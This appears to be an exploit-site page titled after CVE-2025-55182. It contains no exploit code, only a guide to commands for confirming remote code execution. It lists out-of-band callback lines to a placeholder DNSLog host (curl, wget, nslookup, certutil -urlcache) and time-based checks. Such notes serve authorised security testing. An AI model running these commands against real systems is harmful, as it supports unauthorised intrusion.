Share
## https://sploitus.com/exploit?id=FBA4A3EC-9621-550F-8A1C-267D8474C8E4
# Research: All versions of CVE-2025-55182 exploit vulnerabilities  
`open -a Calculator` is a typical local graphical verification command on macOS. However, when performing RCE (Remote Code Execution) verifications on remote servers—usually interfaces-less Linux or Windows Servers—this command becomes ineffective and invisible. In security PoC verifications, the most common and simplest alternative command depends on whether the command’s output can be seen:  

### 1. When the output is visible (Echo/Output-based)  
This is the simplest case. You need a command that proves the code was executed and can reveal your current user privileges.  
**Linux:**  
* `id` (Recommended): This is the standard verification command. It’s concise and not only confirms the existence of an RCE but also shows which user privileges are being used (e.g., `root` or `www-data`).  
* `whoami`: Displays the current username.  
* `uname -a`: Displays system kernel information.  
**Windows:**  
* `whoami` (Recommended): Displays the current user.  
* `ver`: Displays the system version.  

### 2. When no output is visible (Blind RCE/Out-of-Band)  
This is the majority of real-world vulnerability scenarios. The server executes the command, but you don’t see any output in the HTTP response. In this case, **out-of-band** methods must be used, where the server sends requests to the server you control. This is often used in conjunction with tools like DNSLog (e.g., interact.sh, dnslog.cn, burp collaborator).  
**Linux:**  
* `curl http://xxx.dnslog.cn` (Most commonly used): Sends an HTTP request.  
* `ping -c 4 xxx.dnslog.cn`: Sends ICMP requests (some servers may block ping requests).  
* `wget http://xxx.dnslog.cn`: Similar to `curl`.  
* `dig xxx.dnslog.cn` / `nslookup xxx.dnslog.cn`: Sends DNS queries.  
**Windows:**  
* `ping -n 4 xxx.dnslog.cn` (Most commonly used).  
* `nslookup xxx.dnslog.cn`.  
* `certutil -urlcache -split -f http://xxx.dnslog.cn` (Similar to `curl` on Windows).  

### 3. When no network activity is visible (Time-based)  
If the server has a firewall that blocks external requests, no output will be visible. In this case, **timeouts** can be used to determine success.  
**Linux:**  
* `sleep 10`: If the HTTP response delays by 10 seconds before returning, it indicates successful RCE.  
**Windows:**  
* `timeout /t 10` (Note: `timeout` may fail in non-interactive shells).  
* `ping -n 10 127.0.0.1` (Common timeout technique).  

---  

### Summary: Best practices  
When writing general PoC scripts, for compatibility and success rate, the usual priorities are as follows:  
1. **First choice:** `id` (Linux) / `whoami` (Windows) – *Only if the vulnerability involves visible output.*  
2. **General preferred option:** `curl http://` – *Verifies by monitoring DNS resolution records; this is the most reliable method.*  
3. **Alternative option:** `sleep 5` – *Used only if the above methods fail, as they may be falsely reported due to network fluctuations.*  

**Why not use the calculator?**  
Because servers usually lack monitors (headless). Even if the calculator command is successfully executed, the process runs in the background, and nothing can be seen from the frontend, making verification impossible.

[source-iocs-preserved url=http://xxx.dnslog.cn`**,http://xxx.dnslog.cn`:类似]